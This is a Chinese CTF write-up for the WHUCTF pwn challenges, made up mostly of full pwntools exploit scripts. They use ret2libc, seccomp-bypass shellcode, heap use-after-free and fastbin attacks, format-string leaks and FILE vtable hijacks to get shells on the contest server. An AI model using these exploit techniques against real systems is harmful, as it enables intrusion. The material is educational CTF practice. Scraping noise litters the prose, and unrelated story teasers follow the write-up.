whuctf pwn writeup

寫在前面:

這次比賽還是挺酷的膛壹,學到了一些騷操作斗遏,感謝武漢大學舉辦的這次比賽

概述:

  • Pwnpwn:簽到題践惑,ret2libc
  • Shellcode: 開啟了沙盒并且flag路徑未知時的處理情況
  • FFF : uaf利用铲敛,unsorted bin attrack打再free_hook上方寫入main_arena地址膜眠,fastbin attrack打free_hook
  • Arbitrary: f3泄露地址,f1拗踢、f3棧遷移getshell
  • Overflow: 偽造stdout,劫持vtable指向one_gadget
  • Attention : fastbin attrack打數(shù)組指針
  • Heaptrick: 任意地址寫global_max_fast脚牍,io_finsh打io_list_all

pwnpwn:

簡單的棧溢出,ret2libc
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
#context.log_level = 'debug'

binary = 'pwnpw'
elf = ELF('pwnpw')
libc = ELF("./libc-2.23.so")
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10004
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
payload = "a"*(0x88+0x4)+p32(elf.plt["write"])+p32(0x0804843B)+p32(1)+p32(elf.got["read"])+p32(8)
p.recv()
p.sendline(payload)
libc_base = l32()-libc.sym["read"]
lg("libc_base",libc_base)
sys_addr = libc.sym["system"]+libc_base
sh_addr = libc_base+libc.search("/bin/sh").next()
payload = "a"*(0x88+0x4)+p32(sys_addr)+p32(0)+p32(sh_addr)
p.recv()
p.sendline(payload)
# gdb.attach(p)
p.interactive()

shellcode:

題目就是一個簡單shellcode調(diào)用,難點在于不知道flag路徑巢墅,需要自己尋
找诸狭,這里用到了一個函數(shù)sys_getdents

int getdents(unsigned int fd, struct linux_dirent *dirp,unsigned int count);

該函數(shù)是一個解析文件夾的函數(shù),第一個參數(shù)時要解析的文件句柄君纫,第二個參數(shù)是存放解析數(shù)據(jù)的位置驯遇,count是dirp的大小,通過這個我們就可以解析文件夾蓄髓,但是解析數(shù)據(jù)的情況有點糟糕叉庐,但也不難辨認,需要注意的是當打開文件夾時open的第二個參數(shù)為0x10000,打開文件時的參數(shù)為0



可以看到有一個FFFFFFFlag的文件夾会喝,我們進一步解析這個文件夾

解析成功陡叠,然后我們把open的第二個參數(shù)換成0,getdents改為read就好了

可以看到成功打印出flag,
第一部分的shellcode:

payload = shellcraft.open("./",0x10000)
payload += shellcraft.getdents("rax","rsp",0x300)
payload += shellcraft.write(1,"rsp",0x300)

第二部分shellcode:

payload = shellcraft.open("./FFFFFFFFFlag/flag",0)
payload += shellcraft.read("rax","rsp",0x300)
payload += shellcraft.write(1,"rsp",0x300)

小結:

當不知道flag路徑時使用getdents函數(shù)

FFF:

uaf的利用肢执,先unsortedbin attrak再free_hook上方寫入main_arnea的地址枉阵,然后fastbinattrack打free_hook,當然打malloc_hook也可

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
context.log_level = 'debug'

binary = 'pwn222'
elf = ELF('pwn222')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10007
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def choice(idx):
    sla("> ",str(idx))
def add(size):
    choice(1)
    sla("size?\n",str(size))
def show(idx):
    choice(3)
    sla("index?\n",str(idx))
def edit(idx,size,payload):
    choice(2)
    sla("index?\n",str(idx))
    sla("size?\n",str(size))
    sleep(0.1)
    p.sendline(payload)
def free(idx):
    choice(4)
    sla("index?",str(idx))
add(0x88)
add(0x68)
add(0x68)
free(0)
show(0)
libc_base = l64()-0x3c4b78
lg("libc_base",libc_base)
malloc_hook = 0x3c4b78+libc_base
sys_addr = libc_base+magic[3]
free_hook = libc_base+magic[1]

edit(0,0x88,p64(0)+p64(free_hook-0x20))
add(0x88)
free(1)
# free(2)
edit(1,0x68,p64(free_hook-0x13))
add(0x68)
add(0x68)
edit(5,0x68,"a"*3+p64(sys_addr))
edit(2,0x68,"/bin/sh\x00")
free(2)
# gdb.attach(p)
p.interactive()

arbitrary:

格式化字符串漏洞泄露canary,libc,棧遷移:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'pwn4'
elf = ELF('pwn4')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10005
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
p.recv()
p.sendline("3")
p.recv()
p.sendline("%p-%p-%p-%p-%p*%p-%p+%p-%p=%p-%p-%p-%p")

ru("*0x")
codebase = int(p.recv(12),16)-0xca7
lg("codebase",codebase)
ru("+0x")
canary = int(p.recv(16),16)-0xa
lg("canary",canary)
ru("=")
ru("0x")
libc_base = int(p.recv(12),16)-0x20830
lg("libc_base",libc_base)
note = 0x20204C+codebase
p.recv()
p.sendline("1")
p.recv()
p.sendline(str(note))
p.recv()
p.sendline("3")
p.recv()
popr = 0x0000000000021102+libc_base
sh = libc_base+libc.search("/bin/sh").next()
sys = libc.sym["system"]+libc_base
leaver = 0x0000000000042351+libc_base
one = o_g[1]+libc_base
rop = p64(0)+p64(one)
p.sendline(rop)
p.recv()
p.sendline("2")
p.recv()
note = 0x0202060+codebase
payload = p64(canary)*8+p64(note)+p64(leaver)
p.send(payload)
p.recv()
# gdb.attach(p)
p.send(payload)
"""
WHUCTF{Do_yOu_kNow_canary}
"""
p.interactive()

overflow:

偽造io_file劫持vtable指向one_gadget:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'pwn3'
elf = ELF('pwn3')
libc = elf.libc
context.binary = binary

DEBUG = 1
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10006
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
ru("0x")
addr = int(p.recv(12),16)
lg("addr",addr)
codebase = addr-0x202060
lg("codebase",codebase)
def choice(idx):
    sla("Choice:",str(idx))
def show(offset):
    choice(1)
    sla("Offset:\n",str(offset))
def edit(offset,size,data):
    choice(2)
    sla("Offset:\n",str(offset))
    sla("Size:\n",str(size))
    sa("data:\n",payload)
show("-32")
libc_base = l64()-0x3c5540
lg("libc_base",libc_base)
sys_addr = libc_base+libc.sym["system"]
one = o_g[1]+libc_base
jump = libc_base+libc.symbols["_IO_file_jumps"]+0xc0
sh_addr = 0x18cd57+libc_base
payload = p64(0xfbad8800)+p64(addr)*7
payload += p64(addr+1)+p64(0)*4+p64(addr)+p64(1)
payload += p64(0xffffffffffffffff)+p64(0)+p64(addr)+p64(0xffffffffffffffff)
payload += p64(0)+p64(addr)+p64(0)*3+p32(0xffffffff)+p32(0)+p64(0)*2+p64(addr+240)
payload += p64(one)*10
edit(0, "-1", payload)
p.recv()
p.sendline("2")
p.recv()
p.sendline("-48")
p.recv()
p.sendline(str(8))
p.recv()
gdb.attach(p)
p.sendline(p64(addr))
#WHUCTF{Bss_Overflow_And_File_Struct_Exploitation}
p.interactive()

attention:

fastbin attrack打數(shù)組指針:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
context.log_level = 'debug'

binary = 'pwnpwn'
elf = ELF('pwnpwn')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10002
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def choice(idx):
    sla("your choice :",str(idx))
def add():
    choice(1)
def show():
    choice(4)
def free():
    choice(3)
def edit(name,data):
    choice(2)
    sa("name:\n",name)
    sa("data:\n",data)
for i in range(31):
    add()
    free()
edit(p64(0x6010b0-0x10), 'aaa')
add()
add()
edit(p64(elf.got["atoi"]), 'aaa')
show()
libc_base = l64()-libc.sym["atoi"]
sys_addr = libc.sym["system"]+libc_base
edit(p64(sys_addr),p64(0))
# gdb.attach(p)
p.interactive()

heaptrick

任意地址寫global_max_fast预茄,io_finsh打io_list_all:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
context.log_level = 'debug'

binary = 'pwn1'
elf = ELF('pwn1')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10003
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def choice(idx):
    sla("4.exit\n",str(idx))
def add(size,payload):
    choice(1)
    sla("Length:",str(size))
    sa("Content:\n",payload)
def free(idx):
    choice(2)
    sla("Id:\n",str(idx))
def edit(payload):
    choice(3)
    sla("Name:\n",str(payload))
add(0x100,"aaaa")
add(0x100,"aaaa")
add(0x1400,"aaaa")
add(0x100,"aaaa")
free(0)
add(0x100,'\xa0')
libc_base = l64()-0x3c4ba0
lg("libc_base",libc_base)
p.recv()
p.sendline("666")
ru("0x")
codebase = int(p.recv(12),16)
lg("codebase",codebase)
globalmax = 0x3c67f8+libc_base
free_hook = libc_base+libc.sym["__free_hook"]
jump = libc_base+libc.symbols["_IO_file_jumps"]+0xc0
sh_addr = 0x18cd57+libc_base
sys_addr = libc.sym["system"]+libc_base
one = o_g[1]+libc_base
payload = p64(globalmax)*5
edit(payload)
free(2)
payload = p64(0)*2
payload += p64(0)+p64(1)
payload += p64(0)+p64(sh_addr)
payload = payload.ljust(0xc8,"\x00")
payload += p64(jump-0x8)+p64(0)+p64(sys_addr)
add(0x1400,payload)
free(2)
p.recv()
p.sendline("1")
p.recv()
p.sendline(str(0x100))
# gdb.attach(p)
p.interactive()
最后編輯于
?著作權歸作者所有,轉載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末兴溜,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子耻陕,更是在濱河造成了極大的恐慌拙徽,老刑警劉巖,帶你破解...
    沈念sama閱讀 219,539評論 6 508
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件诗宣,死亡現(xiàn)場離奇詭異膘怕,居然都是意外死亡,警方通過查閱死者的電腦和手機梧田,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,594評論 3 396
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門淳蔼,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人裁眯,你說我怎么就攤上這事鹉梨。” “怎么了穿稳?”我有些...
    開封第一講書人閱讀 165,871評論 0 356
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵存皂,是天一觀的道長。 經(jīng)常有香客問我,道長旦袋,這世上最難降的妖魔是什么骤菠? 我笑而不...
    開封第一講書人閱讀 58,963評論 1 295
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮疤孕,結果婚禮上商乎,老公的妹妹穿的比我還像新娘。我一直安慰自己祭阀,他們只是感情好鹉戚,可當我...
    茶點故事閱讀 67,984評論 6 393
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著专控,像睡著了一般抹凳。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上伦腐,一...
    開封第一講書人閱讀 51,763評論 1 307
  • 城市分裂傳說
    那天赢底,我揣著相機與錄音,去河邊找鬼柏蘑。 笑死幸冻,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的辩越。 我是一名探鬼主播嘁扼,決...
    沈念sama閱讀 40,468評論 3 420
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼黔攒!你這毒婦竟也來了?” 一聲冷哼從身側響起强缘,我...
    開封第一講書人閱讀 39,357評論 0 276
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤督惰,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后旅掂,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體赏胚,經(jīng)...
    沈念sama閱讀 45,850評論 1 317
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,002評論 3 338
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年商虐,在試婚紗的時候發(fā)現(xiàn)自己被綠了觉阅。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,144評論 1 351
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡秘车,死狀恐怖典勇,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情叮趴,我是刑警寧澤割笙,帶...
    沈念sama閱讀 35,823評論 5 346
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布,位于F島的核電站眯亦,受9級特大地震影響伤溉,放射性物質(zhì)發(fā)生泄漏般码。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,483評論 3 331
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一乱顾、第九天 我趴在偏房一處隱蔽的房頂上張望板祝。 院中可真熱鬧,春花似錦走净、人聲如沸扔字。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,026評論 0 22
  • 一樁弒父案温技,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽革为。三九已至,卻和暖如春舵鳞,著一層夾襖步出監(jiān)牢的瞬間震檩,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,150評論 1 272
  • 情欲美人皮
    我被黑心中介騙來泰國打工蜓堕, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留抛虏,地道東北人。 一個月前我還...
    沈念sama閱讀 48,415評論 3 373
  • 代替公主和親
    正文 我出身青樓套才,卻偏偏與公主長得像迂猴,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子背伴,可洞房花燭夜當晚...
    茶點故事閱讀 45,092評論 2 355